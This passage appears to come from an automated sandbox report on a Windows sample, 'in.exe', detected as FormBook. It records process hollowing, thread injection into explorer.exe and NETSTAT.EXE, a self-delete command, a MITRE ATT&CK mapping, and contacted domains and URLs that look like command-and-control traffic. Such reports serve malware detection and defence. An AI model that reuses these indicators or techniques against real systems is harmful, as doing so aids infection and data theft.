          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C91DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C87D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C69100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C84120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C73D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CEA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 1_2_00B47910 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,
          Source: C:\Users\user\Desktop\in.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.212 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\in.exeSection loaded: unknown target: C:\Users\user\Desktop\in.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\in.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\in.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\Desktop\in.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\in.exeThread register set: target process: 3292
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 3292
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\in.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\in.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: C30000
          Source: C:\Users\user\Desktop\in.exeProcess created: C:\Users\user\Desktop\in.exe 'C:\Users\user\Desktop\in.exe'
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\in.exe'
          Source: explorer.exe, 00000004.00000000.254833840.0000000001400000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.602243667.00000000040D0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
          Source: explorer.exe, 00000004.00000000.254833840.0000000001400000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.602243667.00000000040D0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.254833840.0000000001400000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.602243667.00000000040D0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.599512509.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
          Source: explorer.exe, 00000004.00000000.254833840.0000000001400000.00000002.00000001.sdmp, NETSTAT.EXE, 0000000B.00000002.602243667.00000000040D0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.273106949.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.599420822.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292552692.0000000001480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.251301972.0000000002B50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292256394.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.598393360.0000000000430000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.598703902.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292614037.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.in.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.in.exe.2b50000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.in.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.in.exe.2b50000.2.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery131Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol2SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Network Connections Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery11Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 339331 Sample: in.exe Startdate: 13/01/2021 Architecture: WINDOWS Score: 100 34 www.spontaneoushomeschooler.com 2->34 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 6 other signatures 2->44 11 in.exe 2->11         started        signatures3 process4 signatures5 52 Maps a DLL or memory area into another process 11->52 54 Tries to detect virtualization through RDTSC time measurements 11->54 14 in.exe 11->14         started        process6 signatures7 56 Modifies the context of a thread in another process (thread injection) 14->56 58 Maps a DLL or memory area into another process 14->58 60 Sample uses process hollowing technique 14->60 62 Queues an APC in another process (thread injection) 14->62 17 explorer.exe 14->17 injected process8 dnsIp9 28 198.54.117.216, 49753, 80 NAMECHEAP-NETUS United States 17->28 30 www.demenageseul.com 199.59.242.153, 49751, 80 BODIS-NJUS United States 17->30 32 6 other IPs or domains 17->32 36 System process connects to network (likely due to code injection or exploit) 17->36 21 NETSTAT.EXE 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          in.exe46%VirustotalBrowse
          in.exe100%AviraTR/ATRAPS.Gen
          in.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.in.exe.b40000.1.unpack100%AviraHEUR/AGEN.1123427Download File
          2.0.in.exe.b40000.0.unpack100%AviraHEUR/AGEN.1123427Download File
          2.2.in.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.in.exe.b40000.0.unpack100%AviraHEUR/AGEN.1123427Download File
          1.2.in.exe.1340000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.in.exe.b40000.0.unpack100%AviraHEUR/AGEN.1123427Download File
          1.2.in.exe.2b50000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.concur.design/uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrI0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.cptdesignstudio.com/uds2/?Y4spQFW=G5yaYpuBg7XYabQFtGr/YwUbUG6Du4hspLJ6ti3LnsVJcslX7oGk4EUBP1FenotTMaF2IKx0Gw==&Ezu=VTChCL_ht2spUrI0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.seak.xyz/uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrI0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.demenageseul.com/uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrI0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.spontaneoushomeschooler.com/0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.spontaneoushomeschooler.com
          		94.23.162.163
          		truetrue
            		unknown
            parkingpage.namecheap.com
            		198.54.117.212
            		truefalse
              		high
              www.demenageseul.com
              		199.59.242.153
              		truetrue
                		unknown
                ext-sq.squarespace.com
                		198.185.159.144
                		truefalse
                  		high
                  www.cptdesignstudio.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.seak.xyz
                    		unknown
                    		unknowntrue
                      		unknown
                      www.besthandstool.icu
                      		unknown
                      		unknowntrue
                        		unknown
                        www.concur.design
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.concur.design/uds2/?Y4spQFW=n2X6clJmCA05S3ZeqrcWmU9LgTYh3Xo9IMSlcPg8h+SS+WcZ+1zi1nXkqGc0mRUifak24jBbuw==&Ezu=VTChCL_ht2spUrItrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.cptdesignstudio.com/uds2/?Y4spQFW=G5yaYpuBg7XYabQFtGr/YwUbUG6Du4hspLJ6ti3LnsVJcslX7oGk4EUBP1FenotTMaF2IKx0Gw==&Ezu=VTChCL_ht2spUrItrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.seak.xyz/uds2/?Y4spQFW=vIE1ET6pQu49m+QHY7YrZ7t2bRuoKngw2h26Ua5bu/NnC6rxsHDfr4DpunyQx1XamxAZm7X6xg==&Ezu=VTChCL_ht2spUrItrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.demenageseul.com/uds2/?Y4spQFW=nX62fi3FGck0KYkDLbl3wNFzysJuwQN4fQs5/MCF0tdU2wk9ctHDwkR8RP5qD5uIs0RtT2NFRQ==&Ezu=VTChCL_ht2spUrItrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.267490258.000000000686B000.00000004.00000001.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.comexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.tiro.comexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.goodfont.co.krexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.carterandcone.comlexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.typography.netDexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://fontfabrik.comexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fonts.comexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.sandoll.co.krexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.spontaneoushomeschooler.com/NETSTAT.EXE, 0000000B.00000002.602127128.000000000365F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sakkal.comexplorer.exe, 00000004.00000000.277980680.000000000BE76000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                199.59.242.153
                                                		unknownUnited States
                                                		395082BODIS-NJUStrue
                                                198.185.159.144
                                                		unknownUnited States
                                                		53831SQUARESPACEUSfalse
                                                198.54.117.212
                                                		unknownUnited States
                                                		22612NAMECHEAP-NETUSfalse
                                                198.54.117.216
                                                		unknownUnited States
                                                		22612NAMECHEAP-NETUStrue

                                                General Information

                                                Joe Sandbox Version:31.0.0 Red Diamond
                                                Analysis ID:339331
                                                Start date:13.01.2021
                                                Start time:21:08:54
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 32s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:in.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:33
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/0@6/4
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 42.2% (good quality ratio 39.2%)
                                                • Quality average: 72.8%
                                                • Quality standard deviation: 30.5%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
